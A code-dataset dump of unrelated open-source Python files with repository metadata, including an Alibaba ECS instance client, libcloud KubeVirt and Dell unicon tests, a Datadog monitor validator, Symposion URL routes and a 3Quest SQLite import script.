if status != ECS_STATUS_STOPPED:
logger.warning("instance [%s] is not in [%s],current status [%s], cannot start it", instance_id,
",".join([ECS_STATUS_STOPPED]), status)
return None
request = StartInstanceRequest()
request.set_InstanceId(instance_id)
response = self.execute(request)
return response
def stop_instance(self, instance_id):
status = self.get_instance_status_by_id(instance_id)
if status != ECS_STATUS_RUNNING:
logger.warning("instance [%s] is not in [%s],current status [%s], cannot stop it", instance_id,
",".join([ECS_STATUS_RUNNING]), status)
return None
request = StopInstanceRequest()
request.set_InstanceId(instance_id)
response = self.execute(request)
return response
def delete_instance(self, instance_id, retry=True):
status = self.get_instance_status_by_id(instance_id)
if status != ECS_STATUS_STOPPED:
logger.error("instance [%s] is not in [%s],current status [%s], cannot delete it", instance_id,
",".join([ECS_STATUS_STOPPED]), status)
return None
# somethings even it's already ECS_STATUS_STOPPED, we still can not delete it.
# just sleep 10 seconds
# we can also retry several times
time.sleep(10)
try_times = 5
while try_times > 0:
try:
if not retry:
try_times = 0
request = DeleteInstanceRequest()
request.set_InstanceId(instance_id)
request.set_Force(True)
response = self.execute(request)
logger.info("successfully delete instance [%s]", instance_id)
return response
except Exception as e:
try_times -= 1
time.sleep(5)
logger.exception("cannot delete instance [%s],retry", instance_id)
@staticmethod
def pretty_json(item):
return json.dumps(json.loads(item.decode("utf-8")), indent=4, separators=(',', ': '))
def show_instances(self):
request = DescribeInstancesRequest.DescribeInstancesRequest()
request.set_PageSize(10)
response = self.client.do_action_with_exception(request)
return ECSClient.pretty_json(response)
def wait_to_stopped_from_pending(self, instance_id, timeout=10):
instances = self.get_instance_detail_by_id(instance_id=instance_id)
if len(instances) == 0:
raise ValueError("no instance was found")
status = instances[0]["Status"]
time_v = 0
while status != ECS_STATUS_STOPPED and time_v < timeout:
time.sleep(5)
time_v += 5
logger.info("[pending -> stopped] [current status: %s]", status)
status = self.get_instance_detail_by_id(instance_id=instance_id)[0]["Status"]
if time_v >= timeout and status != ECS_STATUS_STOPPED:
logger.error("fail to wait to be [%s]; current status: [%s]; time_v: [%s]", ECS_STATUS_STOPPED, status,
str(time_v))
return status
def wait_to_running_from_starting(self, instance_id, timeout=10):
instances = self.get_instance_detail_by_id(instance_id=instance_id)
if len(instances) == 0:
raise ValueError("no instance was found")
status = instances[0]["Status"]
logger.info("[pending -> stopped] [current status: %s]", status)
time_v = 0
while status != ECS_STATUS_RUNNING and time_v < timeout:
time.sleep(5)
time_v += 5
logger.info("[starting -> running] [current status: %s]", status)
status = self.get_instance_detail_by_id(instance_id=instance_id)[0]["Status"]
if time_v >= timeout and status != ECS_STATUS_RUNNING:
logger.info("fail to wait to be [%s]; current status: [%s]; time_v: [%s]", ECS_STATUS_RUNNING, status,
str(time_v))
return status
def wait_to_stopped_from_running(self, instance_id, timeout=10):
instances = self.get_instance_detail_by_id(instance_id=instance_id)
if len(instances) == 0:
raise ValueError("no instance was found")
status = instances[0]["Status"]
time_v = 0
while status != ECS_STATUS_STOPPED and time_v < timeout:
time.sleep(5)
time_v += 5
logger.info("[running -> stopped] [current status: %s]", status)
status = self.get_instance_detail_by_id(instance_id=instance_id)[0]["Status"]
if time_v >= timeout and status != ECS_STATUS_STOPPED:
logger.info("fail to wait to be [%s]; current status: [%s]; time_v: [%s]", ECS_STATUS_STOPPED, status,
str(time_v))
if time_v < timeout and status == ECS_STATUS_STOPPED:
logger.info("wait_to_stopped_from_running success: [%s]", status)
return status
def execute(self, request):
response = self.client.do_action_with_exception(request)
return json.loads(response.decode("utf-8"))
| 42.188406
| 115
| 0.654844
|
3ab5717eb9a9a1e04548160e636139e51ae35eeb
| 371
|
py
|
Python
|
04-python-academy-files-lab/print_comments.py
|
iproduct/intro-python
|
8fcf682286dad3fc65f46ccff33aefab9c601306
|
[
"Apache-2.0"
] | 3
|
2022-01-10T07:56:37.000Z
|
2022-02-14T16:37:56.000Z
|
04-python-academy-files-lab/print_comments.py
|
iproduct/intro-python
|
8fcf682286dad3fc65f46ccff33aefab9c601306
|
[
"Apache-2.0"
] | null | null | null |
04-python-academy-files-lab/print_comments.py
|
iproduct/intro-python
|
8fcf682286dad3fc65f46ccff33aefab9c601306
|
[
"Apache-2.0"
] | 1
|
2022-02-14T16:36:46.000Z
|
2022-02-14T16:36:46.000Z
|
import sys
if __name__ == "__main__":
if len(sys.argv) > 1:
filename = sys.argv[1]
else:
filename = __file__
print(f"Opening: {filename}")
with open(filename, encoding="utf-8") as f:
for i, line in enumerate(f):
pos = line.find("#")
if pos >= 0:
print(f"{i:3d}: {line[pos + 1: ].strip()}")
| 26.5
| 59
| 0.504043
|
c0661af07b482dc3e4eea84108916c9daad84a3e
| 8,365
|
py
|
Python
|
libcloud/test/compute/test_kubevirt.py
|
gig-tech/libcloud
|
3c7f83f64ee72252a14ddc1e1f8cac4474a0be4b
|
[
"Apache-2.0"
] | null | null | null |
libcloud/test/compute/test_kubevirt.py
|
gig-tech/libcloud
|
3c7f83f64ee72252a14ddc1e1f8cac4474a0be4b
|
[
"Apache-2.0"
] | null | null | null |
libcloud/test/compute/test_kubevirt.py
|
gig-tech/libcloud
|
3c7f83f64ee72252a14ddc1e1f8cac4474a0be4b
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from libcloud.compute.drivers.kubevirt import KubeVirtNodeDriver
from libcloud.compute.types import NodeState
from libcloud.utils.py3 import httplib
from libcloud.test import unittest
from libcloud.test import MockHttp
from libcloud.test.common.test_kubernetes import KubernetesAuthTestCaseMixin
from libcloud.test.file_fixtures import ComputeFileFixtures
class KubeVirtTestCase(unittest.TestCase, KubernetesAuthTestCaseMixin):
driver_cls = KubeVirtNodeDriver
fixtures = ComputeFileFixtures('kubevirt')
def setUp(self):
KubeVirtNodeDriver.connectionCls.conn_class = KubeVirtMockHttp
self.driver = KubeVirtNodeDriver(key='user',
secret='pass',
secure=True,
host='foo',
port=6443)
def test_list_locations(self):
locations = self.driver.list_locations()
self.assertEqual(len(locations), 5)
self.assertEqual(locations[0].name, 'default')
self.assertEqual(locations[1].name, 'kube-node-lease')
self.assertEqual(locations[2].name, 'kube-public')
self.assertEqual(locations[3].name, 'kube-system')
namespace4 = locations[0].driver.list_locations()[4].name
self.assertEqual(namespace4, 'kubevirt')
id4 = locations[2].driver.list_locations()[4].id
self.assertEqual(id4, 'e6d3d7e8-0ee5-428b-8e17-5187779e5627')
def test_list_nodes(self):
nodes = self.driver.list_nodes()
id0 = "74fd7665-fbd6-4565-977c-96bd21fb785a"
self.assertEqual(len(nodes), 1)
self.assertEqual(nodes[0].extra['namespace'], 'default')
valid_node_states = {NodeState.RUNNING, NodeState.PENDING, NodeState.STOPPED}
self.assertTrue(nodes[0].state in valid_node_states)
self.assertEqual(nodes[0].name, 'testvm')
self.assertEqual(nodes[0].id, id0)
def test_destroy_node(self):
nodes = self.driver.list_nodes()
to_destroy = nodes[-1]
resp = self.driver.destroy_node(to_destroy)
self.assertTrue(resp)
def test_start_node(self):
nodes = self.driver.list_nodes()
r1 = self.driver.start_node(nodes[0])
self.assertTrue(r1)
def test_stop_node(self):
nodes = self.driver.list_nodes()
r1 = self.driver.stop_node(nodes[0])
self.assertTrue(r1)
def test_reboot_node(self):
nodes = self.driver.list_nodes()
for node in nodes:
if node.name == "testvm":
resp = self.driver.reboot_node(node)
self.assertTrue(resp)
class KubeVirtMockHttp(MockHttp):
fixtures = ComputeFileFixtures('kubevirt')
def _api_v1_namespaces(self, method, url, body, headers):
if method == "GET":
body = self.fixtures.load('_api_v1_namespaces.json')
else:
raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_default_vms.json')
resp = httplib.OK
elif method == "POST":
body = self.fixtures.load('create_vm.json')
resp = httplib.CREATED
else:
AssertionError('Unsupported method')
return (resp, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_kube_node_lease_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_kube_node_lease_vms.json')
elif method == "POST":
pass
else:
AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_kube_public_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_kube_public_vms.json')
elif method == "POST":
pass
else:
AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_kube_system_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_kube_system_vms.json')
elif method == "POST":
pass
else:
AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_kubevirt_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_kube_public_vms.json')
elif method == "POST":
pass
else:
AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines_testvm(self,
method, url, body, headers):
header = "application/merge-patch+json"
data_stop = {"spec": {"running": False}}
data_start = {"spec": {"running": True}}
if method == "PATCH" and headers['Content-Type'] == header and body == data_start:
body = self.fixtures.load('start_testvm.json')
elif method == "PATCH" and headers['Content-Type'] == header and body == data_stop:
body = self.fixtures.load('stop_testvm.json')
else:
AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines_vm_cirros(self,
method, url, body, headers):
header = "application/merge-patch+json"
data_stop = {"spec": {"running": False}}
data_start = {"spec": {"running": True}}
if method == "PATCH" and headers['Content-Type'] == header and body == data_start:
body = self.fixtures.load('start_vm_cirros.json')
elif method == "PATCH" and headers['Content-Type'] == header and body == data_stop:
body = self.fixtures.load('stop_vm_cirros.json')
else:
AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachineinstances_testvm(self,
method, url, body, headers):
if method == "DELETE":
body = self.fixtures.load('delete_vmi_testvm.json')
else:
AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _api_v1_namespaces_default_pods(self, method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_pods.json')
else:
AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if __name__ == '__main__':
sys.exit(unittest.main())
| 39.833333
| 91
| 0.621518
|
364ee95a08a5727972b3d415785ca55545423e8e
| 776
|
py
|
Python
|
File_Handling/04E_directory_traversal/directory_traversal.py
|
MihailMarkovski/Python-Advanced-2020
|
8edea78cbe5588a409ba9bc3767861250f58c1a6
|
[
"MIT"
] | 4
|
2020-09-19T13:53:19.000Z
|
2020-11-01T18:34:53.000Z
|
File_Handling/04E_directory_traversal/directory_traversal.py
|
MNikov/Python-Advanced-September-2020
|
1d65039de7f094d908411afffa8aee9689ab4220
|
[
"MIT"
] | null | null | null |
File_Handling/04E_directory_traversal/directory_traversal.py
|
MNikov/Python-Advanced-September-2020
|
1d65039de7f094d908411afffa8aee9689ab4220
|
[
"MIT"
] | null | null | null |
import os
path = input()
files_dict = {}
sep_count = path.count(os.path.sep)
for root, directories, files in os.walk(path):
if sep_count - root.count(os.path.sep) > 1:
continue
for file in files:
file_extension = file.split('.')[-1]
if file_extension not in files_dict:
files_dict[file_extension] = []
files_dict[file_extension].append(file)
result_string = ''
for ext, files in sorted(files_dict.items()):
result_string += f'.{ext}\n'
for file in sorted(files):
result_string += f'- - - {file}\n'
desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')
final_path = desktop + os.path.sep + 'report.txt'
with open(final_path, 'w') as report_file:
report_file.write(result_string)
| 28.740741
| 74
| 0.654639
|
6cb9aba7086463c56cb5b03a0a57035603977eff
| 2,416
|
py
|
Python
|
src/unicon/plugins/tests/test_plugin_dell.py
|
TestingBytes/unicon.plugins
|
0600956d805deb4fd790aa3ef591c5d659e85de1
|
[
"Apache-2.0"
] | 18
|
2019-11-23T23:14:53.000Z
|
2022-01-10T01:17:08.000Z
|
src/unicon/plugins/tests/test_plugin_dell.py
|
TestingBytes/unicon.plugins
|
0600956d805deb4fd790aa3ef591c5d659e85de1
|
[
"Apache-2.0"
] | 12
|
2020-11-09T20:39:25.000Z
|
2022-03-22T12:46:59.000Z
|
src/unicon/plugins/tests/test_plugin_dell.py
|
TestingBytes/unicon.plugins
|
0600956d805deb4fd790aa3ef591c5d659e85de1
|
[
"Apache-2.0"
] | 32
|
2020-02-12T15:42:22.000Z
|
2022-03-15T16:42:10.000Z
|
import os
import yaml
import unittest
from unittest.mock import patch
import unicon
from unicon import Connection
from unicon.eal.dialogs import Dialog
from unicon.mock.mock_device import mockdata_path
with open(os.path.join(mockdata_path, 'dell/dell_mock_data.yaml'), 'rb') as datafile:
mock_data = yaml.safe_load(datafile.read())
class TestDellPluginConnect(unittest.TestCase):
def test_login_connect(self):
c = Connection(hostname='DellOS6',
start=['mock_device_cli --os dell --state exec'],
os='dell',
username='knox',
tacacs_password='dell1111')
c.connect()
self.assertIn('DellOS6#', c.spawn.match.match_output)
c.disconnect()
def test_login_connect_ssh(self):
c = Connection(hostname='DellOS6',
start=['mock_device_cli --os dell --state connect_ssh'],
os='dell',
username='knox',
tacacs_password='dell1111')
c.connect()
self.assertIn('DellOS6#', c.spawn.match.match_output)
c.disconnect()
def test_login_connect_connectReply(self):
c = Connection(hostname='DellOS6',
start=['mock_device_cli --os dell --state exec'],
os='dell',
username='knox',
tacacs_password='dell1111',
connect_reply = Dialog([[r'^(.*?)Password:']]))
c.connect()
self.assertIn("^(.*?)Password:", str(c.connection_provider.get_connection_dialog()))
c.disconnect()
class TestDellPluginExecute(unittest.TestCase):
def test_execute_show_feature(self):
c = Connection(hostname='DellOS6',
start=['mock_device_cli --os dell --state exec'],
os='dell',
username='knox',
tacacs_password='dell1111',
init_exec_commands=[],
init_config_commands=[]
)
c.connect()
cmd = 'show ip interface'
expected_response = mock_data['exec']['commands'][cmd].strip()
ret = c.execute(cmd).replace('\r', '')
self.assertIn(expected_response, ret)
c.disconnect()
if __name__ == "__main__":
unittest.main()
| 35.529412
| 92
| 0.551738
|
b1e797b82686086d119ec6f5c1ab9f63aff1431f
| 285
|
py
|
Python
|
membership_program/config/desktop.py
|
techlift-tech/membership_program
|
265a84345c26670f037beb7363b05acb3f9586f2
|
[
"MIT"
] | null | null | null |
membership_program/config/desktop.py
|
techlift-tech/membership_program
|
265a84345c26670f037beb7363b05acb3f9586f2
|
[
"MIT"
] | null | null | null |
membership_program/config/desktop.py
|
techlift-tech/membership_program
|
265a84345c26670f037beb7363b05acb3f9586f2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from frappe import _
def get_data():
return [
{
"module_name": "Membership Program",
"color": "grey",
"icon": "octicon octicon-file-directory",
"type": "module",
"label": _("Membership Program")
}
]
| 19
| 44
| 0.635088
|
a8ce2f47da5f0795abf6a620d1e35df9debf97bc
| 581
|
py
|
Python
|
make_video.py
|
jrkwon/CarND-Semantic-Segmentation
|
a17d79b1b73062430ea15fdd5c1e33d12e5b4592
|
[
"MIT"
] | 1
|
2020-07-07T00:24:34.000Z
|
2020-07-07T00:24:34.000Z
|
make_video.py
|
jrkwon/CarND-Semantic-Segmentation
|
a17d79b1b73062430ea15fdd5c1e33d12e5b4592
|
[
"MIT"
] | null | null | null |
make_video.py
|
jrkwon/CarND-Semantic-Segmentation
|
a17d79b1b73062430ea15fdd5c1e33d12e5b4592
|
[
"MIT"
] | null | null | null |
import cv2
import os
import sys
if len(sys.argv) == 1:
print('Need runs_id')
sys.exit()
runs_id = sys.argv[1] #'1545192834.8808994'
image_folder = 'runs/' + runs_id
video_name = 'video-'+runs_id+'.avi'
images = [img for img in sorted(os.listdir(image_folder)) if img.endswith(".png")]
frame = cv2.imread(os.path.join(image_folder, images[0]))
height, width, layers = frame.shape
video = cv2.VideoWriter(video_name, cv2.VideoWriter_fourcc(*'XVID'), 1, (width,height))
for image in images:
video.write(cv2.imread(os.path.join(image_folder, image)))
video.release()
| 25.26087
| 87
| 0.709122
|
c5967f40310eb8ca249fe2b8f6338c134e3236d4
| 5,412
|
py
|
Python
|
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/recommended_monitors.py
|
ypisetsky/integrations-core
|
f7153d3f896827c3325c7f0ec088bc17d088a894
|
[
"BSD-3-Clause"
] | 1
|
2021-06-06T23:49:17.000Z
|
2021-06-06T23:49:17.000Z
|
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/recommended_monitors.py
|
ypisetsky/integrations-core
|
f7153d3f896827c3325c7f0ec088bc17d088a894
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/recommended_monitors.py
|
ypisetsky/integrations-core
|
f7153d3f896827c3325c7f0ec088bc17d088a894
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import json
import os
import click
from ....utils import read_file
from ...testing import process_checks_option
from ...utils import complete_valid_checks, get_assets_from_manifest, load_manifest
from ..console import CONTEXT_SETTINGS, abort, echo_failure, echo_info, echo_success
REQUIRED_ATTRIBUTES = {'name', 'type', 'query', 'message', 'tags', 'options', 'recommended_monitor_metadata'}
EXTRA_NOT_ALLOWED_FIELDS = ['id']
ALLOWED_MONITOR_TYPES = ['query alert', 'event alert', 'service check']
@click.command(
'recommended-monitors',
context_settings=CONTEXT_SETTINGS,
short_help='Validate recommended monitor definition JSON files',
)
@click.argument('check', autocompletion=complete_valid_checks, required=False)
def recommended_monitors(check):
"""Validate all recommended monitors definition files.
If `check` is specified, only the check will be validated, if check value is 'changed' will only apply to changed
checks, an 'all' or empty `check` value will validate all README files.
"""
checks = process_checks_option(check, source='integrations')
echo_info(f"Validating recommended monitors for {len(checks)} checks ...")
failed_checks = 0
ok_checks = 0
for check_name in checks:
display_queue = []
file_failed = False
manifest = load_manifest(check_name)
monitors_relative_locations, invalid_files = get_assets_from_manifest(check_name, 'monitors')
for file in invalid_files:
echo_info(f'{check_name}... ', nl=False)
echo_info(' FAILED')
echo_failure(f' {file} does not exist')
failed_checks += 1
for monitor_file in monitors_relative_locations:
monitor_filename = os.path.basename(monitor_file)
try:
decoded = json.loads(read_file(monitor_file).strip())
except json.JSONDecodeError as e:
failed_checks += 1
echo_info(f'{check_name}... ', nl=False)
echo_failure(' FAILED')
echo_failure(f' invalid json: {e}')
continue
all_keys = set(decoded.keys())
if not REQUIRED_ATTRIBUTES.issubset(all_keys):
missing_fields = REQUIRED_ATTRIBUTES.difference(all_keys)
file_failed = True
display_queue.append(
(echo_failure, f" {monitor_filename} does not contain the required fields: {missing_fields}"),
)
elif any([item for item in all_keys if item in EXTRA_NOT_ALLOWED_FIELDS]):
file_failed = True
display_queue.append(
(
echo_failure,
f" {monitor_filename} contains unsupported field(s). Please ensure none of the following are"
f" in the file: {EXTRA_NOT_ALLOWED_FIELDS}",
),
)
else:
# If all required keys exist, validate values
monitor_type = decoded.get('type')
if monitor_type not in ALLOWED_MONITOR_TYPES:
file_failed = True
display_queue.append(
(
echo_failure,
f" {monitor_filename} is of unsupported type: \"{monitor_type}\". Only"
f" the following types are allowed: {ALLOWED_MONITOR_TYPES}",
)
)
description = decoded.get('recommended_monitor_metadata').get('description')
if description is not None:
if len(description) > 300:
file_failed = True
display_queue.append(
(
echo_failure,
f" {monitor_filename} has a description field that is too long, must be < 300 chars",
),
)
result = [i for i in decoded.get('tags') if i.startswith('integration:')]
if len(result) < 1:
file_failed = True
display_queue.append((echo_failure, f" {monitor_filename} must have an `integration` tag"))
display_name = manifest.get("display_name").lower()
monitor_name = decoded.get('name').lower()
if not (check_name in monitor_name or display_name in monitor_name):
file_failed = True
display_queue.append(
(echo_failure, f" {monitor_filename} name must contain the integration name"),
)
if file_failed:
failed_checks += 1
# Display detailed info if file is invalid
echo_info(f'{check_name}... ', nl=False)
echo_failure(' FAILED')
for display_func, message in display_queue:
display_func(message)
display_queue = []
else:
ok_checks += 1
if ok_checks:
echo_success(f"{ok_checks} valid files")
if failed_checks:
echo_failure(f"{failed_checks} invalid files")
abort()
| 41.312977
| 120
| 0.571877
|
3679a441970e3fdd0647330f8378b3cbce1d21f1
| 1,824
|
py
|
Python
|
symposion/schedule/urls.py
|
pyohio/symposion
|
f8ec9c7e7daab4658061867d1294c1c126dd2919
|
[
"BSD-3-Clause"
] | null | null | null |
symposion/schedule/urls.py
|
pyohio/symposion
|
f8ec9c7e7daab4658061867d1294c1c126dd2919
|
[
"BSD-3-Clause"
] | 5
|
2015-07-16T19:46:00.000Z
|
2018-03-11T05:58:48.000Z
|
symposion/schedule/urls.py
|
pyohio/symposion
|
f8ec9c7e7daab4658061867d1294c1c126dd2919
|
[
"BSD-3-Clause"
] | 1
|
2017-01-27T21:18:26.000Z
|
2017-01-27T21:18:26.000Z
|
from __future__ import unicode_literals
from django.conf.urls import url
from .views import (
schedule_conference,
schedule_edit,
schedule_list,
schedule_list_csv,
schedule_list_json,
schedule_presentation_detail,
schedule_detail,
schedule_slot_edit,
schedule_json,
session_staff_email,
session_list,
session_detail,
speaker_list_json,
organizer_list_json,
slots_list_json,
)
urlpatterns = [
url(r"^$", schedule_conference, name="schedule_conference"),
url(r"^edit/$", schedule_edit, name="schedule_edit"),
url(r"^list/$", schedule_list, name="schedule_list"),
url(r"^presentations.csv$", schedule_list_csv, name="schedule_list_csv"),
url(r"^presentation/(\d+)/$", schedule_presentation_detail, name="schedule_presentation_detail"),
url(r"^organizers/list/json/$", organizer_list_json, name="organizer_list_json"),
url(r"^speakers/list/json/$", speaker_list_json, name="speaker_list_json"),
url(r"^slots/list/json/$", slots_list_json, name="slots_list_json"),
url(r"^([\w\-]+)/$", schedule_detail, name="schedule_detail"),
url(r"^([\w\-]+)/edit/$", schedule_edit, name="schedule_edit"),
url(r"^([\w\-]+)/list/$", schedule_list, name="schedule_list"),
url(r"^([\w\-]+)/list/json/$", schedule_list_json, name="schedule_list_json"),
url(r"^([\w\-]+)/presentations.csv$", schedule_list_csv, name="schedule_list_csv"),
url(r"^([\w\-]+)/edit/slot/(\d+)/", schedule_slot_edit, name="schedule_slot_edit"),
url(r"^conference.json", schedule_json, name="schedule_json"),
url(r"^sessions/staff.txt$", session_staff_email, name="schedule_session_staff_email"),
url(r"^sessions/$", session_list, name="schedule_session_list"),
url(r"^session/(\d+)/$", session_detail, name="schedule_session_detail"),
]
| 43.428571
| 101
| 0.697917
|
9b57b05732f73fa5f2d1b20dc1099d44b4a8f2c7
| 6,397
|
py
|
Python
|
3QVeryMuch/test/test_stort3Qdb.py
|
philip-shen/note_python
|
db0ad84af25464a22ac52e348960107c81e74a56
|
[
"MIT"
] | null | null | null |
3QVeryMuch/test/test_stort3Qdb.py
|
philip-shen/note_python
|
db0ad84af25464a22ac52e348960107c81e74a56
|
[
"MIT"
] | 11
|
2021-02-08T20:45:23.000Z
|
2022-03-12T01:00:11.000Z
|
3QVeryMuch/test/test_stort3Qdb.py
|
philip-shen/note_python
|
db0ad84af25464a22ac52e348960107c81e74a56
|
[
"MIT"
] | null | null | null |
# 3/28/2020 Convert Nested JSON to Pandas DataFrame and Flatten List in a Column
# https://gist.github.com/rafaan/4ddc91ae47ea46a46c0b
# 6/25/2020 Initial
########################################################
import json
from pandas.io.json import json_normalize
import pandas as pd
import os,sys,time,platform
strabspath=os.path.abspath(__file__)
strdirname=os.path.dirname(strabspath)
str_split=os.path.split(strdirname)
prevdirname=str_split[0]
dirnamelib=os.path.join(prevdirname,"lib")
dirnamelog=os.path.join(prevdirname,"logs")
sys.path.append(dirnamelib)
from logger import logger
from libCSV import *
import csvdataAnalysis as csvdata_analysis
import db_sqlite as db_sqlite
if __name__ == "__main__":
# Get present time
t0 = time.time()
local_time = time.localtime(t0)
msg = 'Start Time is {}/{}/{} {}:{}:{}'
logger.info(msg.format( local_time.tm_year,local_time.tm_mon,local_time.tm_mday,\
local_time.tm_hour,local_time.tm_min,local_time.tm_sec))
args = sys.argv
with open('config.json') as f:
data = json.load(f)
try:
for i,_3quest in enumerate(data["3Quest"]):
# Check path if exists or not
if(os.path.isdir(os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results'))):
'''
0th path_dut_3quest:..\logs\boommic_SWout\dut.3quest\Results
1th path_dut_3quest:..\logs\Intermic_SWin\dut.3quest\Results
'''
path_dut_3quest_results = os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results')
msg = '{}th path_dut_3quest_results:{}'
logger.info(msg.format(i, path_dut_3quest_results) )
file_type="*.csv"
ret_list_3questFolder_CsvFiles = walk_in_dir(path_dut_3quest_results,file_type)
opt_verbose='ON'
#opt_verbose='OFF'
local_csvdata_analysis = csvdata_analysis.CSVDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
local_csvdata_analysis.read_CSVFile()
tmp_csv=local_csvdata_analysis.write_CSVFile_del1strow()
# copy tmp.csv to output.csv of 3Quest Result Path
local_csvdata_analysis.copy_CSVFile_to3questResultPath(tmp_csv,\
local_csvdata_analysis._3questfolder_csvfiles)
local_csvdata_analysis = csvdata_analysis.PandasDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
# get list of all background noise 3Quest value
list_allnoises_3quest_values = local_csvdata_analysis.parse_CSVFile_02()
# prepare dut_foldername, insert_date, insert_time
path_dut = os.path.dirname(data["3Quest"][i]['path_dut'])
str_split=os.path.split(path_dut)
dut_foldername=str_split[1]
insert_date = str(local_time.tm_year)+str("{:02d}".format(local_time.tm_mon) )+str("{:02d}".format(local_time.tm_mday))
insert_time = str("{:02d}".format(local_time.tm_hour))+':'+str("{:02d}".format(local_time.tm_min))+':'+str("{:02d}".format(local_time.tm_sec))
# Ready to store 3Quest data to DB
if platform.system().lower() == 'windows': db_name_3quest = '3QuestDB.db'
if platform.system().lower() == 'linux': db_name_3quest = '3QuestDB_tensor4.db'
path_db = os.path.join(dirnamelog,db_name_3quest)
localdb_sqlite = db_sqlite.DB_sqlite(path_db,\
dut_foldername,insert_date,insert_time,\
path_dut,\
opt_verbose)
# create a database connection
conn = localdb_sqlite.create_connection()
if conn is not None:
# create projects table
localdb_sqlite.create_all_tables_3Quest(conn)
else:
print("Error! cannot create the database connection.")
# Insert noise type data to DB
localdb_sqlite.insert_noise_file_tosqlite(localdb_sqlite, conn)
# Insert dut path data to DB to prevent 3Quest data redundancy
number_of_rows_3Quest_path = localdb_sqlite.insert_3quest_path_tosqlite(localdb_sqlite, conn)
if number_of_rows_3Quest_path < 1:# Insert if not exists
for list_noises_3quest_values in list_allnoises_3quest_values:
'''
INFO: list_noises_3quest_values:[['pub', 'pub', 'pub', 'pub'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['2.840550', '4.154481', '2.914813', '29.453750']]
INFO: list_noises_3quest_values:[['AVG', 'AVG', 'AVG', 'AVG'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['3.358136', '4.220144', '3.328679', '24.638061']]
'''
#Insert list_noises_3quest_values data into sqlite
localdb_sqlite.insert_csv_data_tosqlite(list_noises_3quest_values, \
localdb_sqlite, \
conn)
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
except IOError:
print('IOError: Couldn\'t open "%s"' % args[1])
msg = 'Time duration: {:.2f} seconds.'
logger.info(msg.format( time.time() - t0))
| 47.385185
| 176
| 0.530405
|
8b1e22d994ed025617c24c82bd0c0bc97fa27c98
| 6,046
|
py
|
Python
|
salt/modules/ldapmod.py
|
ifraixedes/saltstack-salt
|
b54becb8b43cc9b7c00b2c0bc637ac534dc62896
|
[
"Apache-2.0"
] | 9,425
|
2015-01-01T05:59:24.000Z
|
2022-03-31T20:44:05.000Z
|
salt/modules/ldapmod.py
|
ifraixedes/saltstack-salt
|
b54becb8b43cc9b7c00b2c0bc637ac534dc62896
|
[
"Apache-2.0"
] | 33,507
|
2015-01-01T00:19:56.000Z
|
2022-03-31T23:48:20.000Z
|
salt/modules/ldapmod.py
|
ifraixedes/saltstack-salt
|
b54becb8b43cc9b7c00b2c0bc637ac534dc62896
|
[
"Apache-2.0"
] | 5,810
|
2015-01-01T19:11:45.000Z
|
2022-03-31T02:37:20.000Z
|
"""
Salt interface to LDAP commands
:depends: - ldap Python module
:configuration: In order to connect to LDAP, certain configuration is required
in the minion config on the LDAP server. The minimum configuration items
that must be set are:
.. code-block:: yaml
ldap.basedn: dc=acme,dc=com (example values, adjust to suit)
If your LDAP server requires authentication then you must also set:
.. code-block:: yaml
ldap.anonymous: False
ldap.binddn: admin
ldap.bindpw: password
In addition, the following optional values may be set:
.. code-block:: yaml
ldap.server: localhost (default=localhost, see warning below)
ldap.port: 389 (default=389, standard port)
ldap.tls: False (default=False, no TLS)
ldap.no_verify: False (default=False, verify TLS)
